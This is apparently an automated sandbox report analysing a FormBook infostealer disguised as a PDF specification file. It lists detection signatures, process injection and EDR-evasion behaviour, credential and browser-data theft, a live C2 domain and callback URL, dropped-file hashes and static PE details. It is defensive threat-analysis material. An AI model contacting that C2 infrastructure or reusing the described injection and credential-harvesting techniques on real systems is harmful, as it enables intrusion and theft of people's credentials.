              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_XPe
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_VISTA
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_7
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_8

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00398C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00398C4F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0039923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0039923B

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts              		3
              Native API              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Valid Accounts              		1
              Abuse Elevation Control Mechanism              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
              Valid Accounts              		3
              Obfuscated Files or Information              		NTDS116
              System Information Discovery              		Distributed Component Object Model21
              Input Capture              		3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
              Access Token Manipulation              		1
              DLL Side-Loading              		LSA Secrets161
              Security Software Discovery              		SSH3
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
              Process Injection              		2
              Valid Accounts              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569166 Sample: HENG HUI 68 FULL SPECIFICAT... Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 27 www.topkapiescortg.xyz 2->27 31 Suricata IDS alerts for network traffic 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected FormBook 2->35 39 3 other signatures 2->39 10 HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe 4 2->10         started        signatures3 37 Performs DNS queries to domains with low reputation 27->37 process4 signatures5 49 Binary is likely a compiled AutoIt script file 10->49 51 Writes to foreign memory regions 10->51 53 Maps a DLL or memory area into another process 10->53 13 svchost.exe 10->13         started        process6 signatures7 55 Modifies the context of a thread in another process (thread injection) 13->55 57 Maps a DLL or memory area into another process 13->57 59 Queues an APC in another process (thread injection) 13->59 61 Switches to a custom stack to bypass stack traces 13->61 16 RAVCpl64.exe 13->16 injected process8 dnsIp9 25 www.topkapiescortg.xyz 172.67.134.42, 49739, 80 CLOUDFLARENETUS United States 16->25 29 Found direct / indirect Syscall (likely to bypass EDR) 16->29 20 newdev.exe 13 16->20         started        signatures10 process11 signatures12 41 Tries to steal Mail credentials (via file / registry access) 20->41 43 Tries to harvest and steal browser information (history, passwords, etc) 20->43 45 Modifies the context of a thread in another process (thread injection) 20->45 47 2 other signatures 20->47 23 firefox.exe 20->23         started        process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe47%ReversingLabsWin32.Trojan.AutoitInject
              HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.topkapiescortg.xyz/cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak=0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.topkapiescortg.xyz
              		172.67.134.42
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.topkapiescortg.xyz/cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak=true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://ac.ecosia.org/autocomplete?q=newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/chrome_newtabnewdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drfalse
                    		high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=E8-03HaL.3.drfalse
                      		high
                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchnewdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=E8-03HaL.3.drfalse
                          		high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconewdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drfalse
                            		high
                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=newdev.exe, 00000003.00000003.6752649694.0000000007EE9000.00000004.00000020.00020000.00000000.sdmp, E8-03HaL.3.drfalse
                              		high
                              https://www.ecosia.org/newtab/newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://gemini.google.com/app?q=newdev.exe, 00000003.00000002.6806932663.0000000007E7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.67.134.42
                                    		www.topkapiescortg.xyzUnited States
                                    		13335CLOUDFLARENETUStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1569166
                                    Start date and time:2024-12-05 15:18:49 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 15m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/5@1/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 44
                                    • Number of non-executed functions: 289
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                    Warnings

                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • VT rate limit hit for: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    www.topkapiescortg.xyzSalmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 104.21.6.17

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://web1.zixmail.net/s/e?b=visionsfcu&m=ABDp2JMatf1efCmjdBwunEWp&c=ABAP8cyUaKYihS5n3iwA36rC&em=CMancinelli%40lgtlegal%2ecomGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    https://bb.vg/STDBANKGet hashmaliciousUnknownBrowse
                                    • 172.67.178.54
                                    b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.71.43
                                    #U25b6#Ufe0fPlayVoiceMessage9312.emlGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                                    • 104.18.37.193
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.43.156
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    http://accounts.benefitt.bestGet hashmaliciousUnknownBrowse
                                    • 104.21.95.6
                                    https://receptive-comfortable-paw.glitch.me/Get hashmaliciousUnknownBrowse
                                    • 172.66.46.218
                                    https://accounts.benefitt.best/representaton.aspx?sets=LTxWNUY5RiVSMCYtRDlSWU04MCAgGet hashmaliciousUnknownBrowse
                                    • 104.21.95.6

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\Archimago

                                    Download File
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):287744
                                    Entropy (8bit):7.99436007823748
                                    Encrypted:true
                                    SSDEEP:6144:DOTHv7ZoVb35BDV02gDCWEyhDbD6pAM5AcQy8TjB+C7zWNgIfyG:STHaVt02gDCODqq/y8TRz0ZaG
                                    MD5:5AA7D981878855DDD4F92DF51FCDFB66
                                    SHA1:600FC49F12D1922E79779C28521325B9CA8EA1DA
                                    SHA-256:B9D2DDB8C9754044C842D980142F309FAE139094DA50CD67E7446634A432EA9B
                                    SHA-512:85518808025DA37FEC1517112C8563137665C1D5919C3FE1080A4C456BB04A3679C38DC341C0FA9DD7B728A31BD9628EA095E28729BA6A231CB1EABABCDC8F64
                                    Malicious:false
                                    Reputation:low
                                    Preview:...GGWYS7HUA..NM.DWYS3HU.YENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS.HUAWZ.CG.^.r.I..x.&$4d'+<T:4,y&/#)+#y1Vh'47e'#g...s^'1$wHCGcDWYS3HU8XL.p'#.d3T.h!>.T..m94.R..y.*.^...(2..,-%z$0.S3HUAYEN..DW.R2HW.d.NMGDWYS3.UCXNOFGD.]S3HUAYENMwPWYS#HUA)ANMG.WYC3HUCYEHMGDWYS3NUAYENMGD']S3JUAYENMED..S3XUAIENMGTWYC3HUAYE^MGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMi02!'3HU5.ANMWDWY.7HUQYENMGDWYS3HUAYeNM'DWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUA

                                    C:\Users\user\AppData\Local\Temp\E8-03HaL

                                    Download File
                                    Process:C:\Windows\SysWOW64\newdev.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):135168
                                    Entropy (8bit):1.1142956103012707
                                    Encrypted:false
                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                    MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                    SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                    SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                    SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\autBB75.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):287744
                                    Entropy (8bit):7.99436007823748
                                    Encrypted:true
                                    SSDEEP:6144:DOTHv7ZoVb35BDV02gDCWEyhDbD6pAM5AcQy8TjB+C7zWNgIfyG:STHaVt02gDCODqq/y8TRz0ZaG
                                    MD5:5AA7D981878855DDD4F92DF51FCDFB66
                                    SHA1:600FC49F12D1922E79779C28521325B9CA8EA1DA
                                    SHA-256:B9D2DDB8C9754044C842D980142F309FAE139094DA50CD67E7446634A432EA9B
                                    SHA-512:85518808025DA37FEC1517112C8563137665C1D5919C3FE1080A4C456BB04A3679C38DC341C0FA9DD7B728A31BD9628EA095E28729BA6A231CB1EABABCDC8F64
                                    Malicious:false
                                    Reputation:low
                                    Preview:...GGWYS7HUA..NM.DWYS3HU.YENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS.HUAWZ.CG.^.r.I..x.&$4d'+<T:4,y&/#)+#y1Vh'47e'#g...s^'1$wHCGcDWYS3HU8XL.p'#.d3T.h!>.T..m94.R..y.*.^...(2..,-%z$0.S3HUAYEN..DW.R2HW.d.NMGDWYS3.UCXNOFGD.]S3HUAYENMwPWYS#HUA)ANMG.WYC3HUCYEHMGDWYS3NUAYENMGD']S3JUAYENMED..S3XUAIENMGTWYC3HUAYE^MGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMi02!'3HU5.ANMWDWY.7HUQYENMGDWYS3HUAYeNM'DWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUAYENMGDWYS3HUA

                                    C:\Users\user\AppData\Local\Temp\autBC13.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9740
                                    Entropy (8bit):7.624182970962337
                                    Encrypted:false
                                    SSDEEP:192:ldJIIApKw4NW+gVGTgcw+a0mpKpuqlgS8pR7xCEVJJDVdNQDAJaFP/rf:lPJApYNTwP0moDlgFtxJxduA8Fnrf
                                    MD5:532369FC4F248F5774CF6A3C0537A5FC
                                    SHA1:0D4F6CF28886D478E875FB04001D68CC11DEB7A7
                                    SHA-256:17477E3056C868843AD593B4A6F0BFBA407FA3686FD2B77538F190D268E69641
                                    SHA-512:6CB7C103667F2A3828FF34C8A1641852B57CD4AD3053370DE00F51D7E94D21681CB86C71694318960A1246FE09229385127B2398ACB2590BADCD353EB7B05C51
                                    Malicious:false
                                    Preview:EA06..p..L..Y..m9..f7...sc.Y'3+5..d... .$.o6.X.3{..c1...........`...@.K..f.%...r.lY........d...@.o..c..&...Lls....f.Y...b..-vm6.M@......7.l,........X..K ........g6Y......l..].M..p...9|....r.1..... ..$h.c.....#@...H,....`..m1.H.f.0...<zm6....!:.B...S..n..Y..s8.t.,.0....5....p....9.... ....d....`....1.....0..Y......./Z..-zu6...js8...zn........V)...#...Nf...N.^.:.....8.:..w.......8...}3.#..qd...g.`./....J.v.6.X.{......)....b..g.....`.Y..`...&.......x...u| ......l`=.%.f....f.9...,sp./..9....`..%.......;$..#..l.0./.m6.M@4.;$..K..4|.K..g.d....d.Nf.y....x.g.{ ..d..gSi...@}.<..3.....33+..uf..g6PC`..s....f.,..j........Y.......Y.,.r.Y. .f.e...8...@.2....;2.X.b..Lg@...... ....38...[........9e..,vf.....k3........#.0.....3b.Y.6pj.....Bvh.....@R...o9.4@9..NM..;4.X.n.:M.@..........c.P....3)..f.... ......8.a...g...B)..'f......j.b.X.@..u6..Bvl......).;...N@.;7.X...Cv0}.....g <..L..8.....g..@.@....`...f..!..Lf....l....B;8.X...c3.%..:...!...Gg ....,d..Yg..........c.....

                                    C:\Users\user\AppData\Local\Temp\outbluffed

                                    Download File
                                    Process:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File Type:ASCII text, with very long lines (28698), with no line terminators
                                    Category:dropped
                                    Size (bytes):28698
                                    Entropy (8bit):3.577948780476917
                                    Encrypted:false
                                    SSDEEP:384:LAYzxrp0FwaI4EYVLXDXZZRdFHuTZ8d450i:LAYz7VaI4EYZDXZbHuGe50i
                                    MD5:6199BCBE4CE5C1DA7863BA24F414FC56
                                    SHA1:15D8C26190317BE5E5E16660F57AF28677E98E7A
                                    SHA-256:B9925B9C1E24CA05296D4AF98D74A007988C27763858F877EE1D960DA83C3AF0
                                    SHA-512:2FF4FD5338C3FEDCFCC4F01F4B3AF59B46673AD46EF53A35D0C63179D67B2AA04FB3E6572A7FAB399C1FCAB61ADF00A5529AB550CB6B6212D80171841D1F125D
                                    Malicious:false
                                    Preview:6255206955201y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.117540817102013
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    File size:1'187'840 bytes
                                    MD5:0f4c38f8def111c7fdb237b985c66ca0
                                    SHA1:18add6ba22e3c62913161dd98a39458a9e753713
                                    SHA256:b06fc744b4cfd48aeda3eabc2cba8a079b02a9d908920b6944130c6b950e8891
                                    SHA512:7d2724eebaf4fbafa31a7f3e8f189c1aad265001b17d2a4fc003498cdc841c94b4169192cdd3052c928537962213193ce08a98a76b646f0b6152f6f863cf9ee5
                                    SSDEEP:24576:mtb20pkaCqT5TBWgNQ7ax93VR9PXPjqfjuLSn1Lq6A:TVg5tQ7ax9WjCSn1+5
                                    TLSH:C645CF1373DE8361C3725273BA65B701AE7B782506B5F96B2FD8093CE920122525EB73
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                    File Icon

                                    Icon Hash:aaf3e3e3938382a0

                                    Static PE Info

                                    General

                                    Entrypoint:0x425f74
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x675156B9 [Thu Dec 5 07:31:05 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F41FCAFBFCFh
                                    jmp 00007F41FCAEEFE4h
                                    int3
                                    int3
                                    push edi
                                    push esi
                                    mov esi, dword ptr [esp+10h]
                                    mov ecx, dword ptr [esp+14h]
                                    mov edi, dword ptr [esp+0Ch]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F41FCAEF16Ah
                                    cmp edi, eax
                                    jc 00007F41FCAEF4CEh
                                    bt dword ptr [004C0158h], 01h
                                    jnc 00007F41FCAEF169h
                                    rep movsb
                                    jmp 00007F41FCAEF47Ch
                                    cmp ecx, 00000080h
                                    jc 00007F41FCAEF334h
                                    mov eax, edi
                                    xor eax, esi
                                    test eax, 0000000Fh
                                    jne 00007F41FCAEF170h
                                    bt dword ptr [004BA370h], 01h
                                    jc 00007F41FCAEF640h
                                    bt dword ptr [004C0158h], 00000000h
                                    jnc 00007F41FCAEF30Dh
                                    test edi, 00000003h
                                    jne 00007F41FCAEF31Eh
                                    test esi, 00000003h
                                    jne 00007F41FCAEF2FDh
                                    bt edi, 02h
                                    jnc 00007F41FCAEF16Fh
                                    mov eax, dword ptr [esi]
                                    sub ecx, 04h
                                    lea esi, dword ptr [esi+04h]
                                    mov dword ptr [edi], eax
                                    lea edi, dword ptr [edi+04h]
                                    bt edi, 03h
                                    jnc 00007F41FCAEF173h
                                    movq xmm1, qword ptr [esi]
                                    sub ecx, 08h
                                    lea esi, dword ptr [esi+08h]
                                    movq qword ptr [edi], xmm1
                                    lea edi, dword ptr [edi+08h]
                                    test esi, 00000007h
                                    je 00007F41FCAEF1C5h
                                    bt esi, 03h
                                    jnc 00007F41FCAEF218h
                                    movdqa xmm1, dqword ptr [esi+00h]

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2012 UPD4 build 61030
                                    • [RES] VS2012 UPD4 build 61030
                                    • [LNK] VS2012 UPD4 build 61030

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x58efc.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x11d0000x6c4c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

